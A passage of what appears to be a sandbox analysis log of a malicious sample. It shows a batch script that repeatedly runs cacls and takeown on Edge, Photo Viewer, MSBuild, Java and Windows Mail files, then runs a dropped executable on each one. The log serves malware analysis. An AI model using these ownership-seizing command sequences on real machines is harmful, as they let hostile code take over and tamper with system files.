    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\sl.pak""
  2⤵
  PID:6412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\sl.pak" /E /G Admin:F /C
    3⤵
    PID:7152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\Locales\sl.pak"
    3⤵
    PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "sl.pak" -nobanner
    3⤵
    PID:6120
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "sl.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:1380
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\tt.pak""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\tt.pak" /E /G Admin:F /C
    3⤵
    PID:9184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\tt.pak"
    3⤵
    - Modifies file permissions
    PID:4684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "tt.pak" -nobanner
    3⤵
    PID:9188
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "tt.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:7924
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\msedge.exe""
  2⤵
  PID:868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\msedge.exe" /E /G Admin:F /C
    3⤵
    PID:8904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\msedge.exe"
    3⤵
    PID:6708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "msedge.exe" -nobanner
    3⤵
    PID:6000
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "msedge.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:5912
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\or.pak""
  2⤵
  PID:6756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\or.pak" /E /G Admin:F /C
    3⤵
    PID:6384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Locales\or.pak"
    3⤵
    - Modifies file permissions
    PID:3460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "or.pak" -nobanner
    3⤵
    PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "or.pak" -nobanner
      4⤵
      Executes dropped EXE
      PID:7184
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5928
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:2656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:6332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5240
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:8312
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:6424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:8420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1592
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:6220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:6216
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6200
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:2480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:6324
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:9152
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:9136
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:9064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\msedgewebview2.exe""
  2⤵
  PID:9116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\msedgewebview2.exe" /E /G Admin:F /C
    3⤵
    PID:9004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\msedgewebview2.exe"
    3⤵
    PID:8996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "msedgewebview2.exe" -nobanner
    3⤵
    PID:8992
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "msedgewebview2.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:8976
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:8864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:5772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:8776
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:8764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:8756
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:8740
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:7132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:9032
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:6372
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:7516
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:7492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:5840
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:8388
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:8568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"
    3⤵
    PID:8588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:8596
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:2584
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:8032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2596
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:8064
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:8020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:7996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3028
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      PID:280
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:6388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:488
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:1904
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3584
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:5448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:5224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    PID:6432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4392
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:8376
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:6940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    PID:8216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:680
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:6888
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:5708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:1252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    PID:6648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:5344
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:6564
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""
  2⤵
  PID:6028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:7388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:5712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4568
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "classes.jsa" -nobanner
      4⤵
      PID:5840
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8604
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:3416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:8188
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:7932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:7304
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:8284
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:9124
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:6184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:3544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:6480
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:8244
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:7428
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:8596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:7112
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:6652
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui""
  2⤵
  PID:6700
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6692
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:6800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ImagingDevices.exe.mui"
    3⤵
    PID:6932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:8400
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:6684
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:8404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\h53e8QJZ.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:5308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    PID:7064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3776
  - - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
      WZX2Alx1.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:7160
- - C:\Users\Admin\AppData\Local\Temp\WZX2Alx1.exe
    WZX2Alx1.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6920
- C:\Windows\SysWOW64\cmd.exe
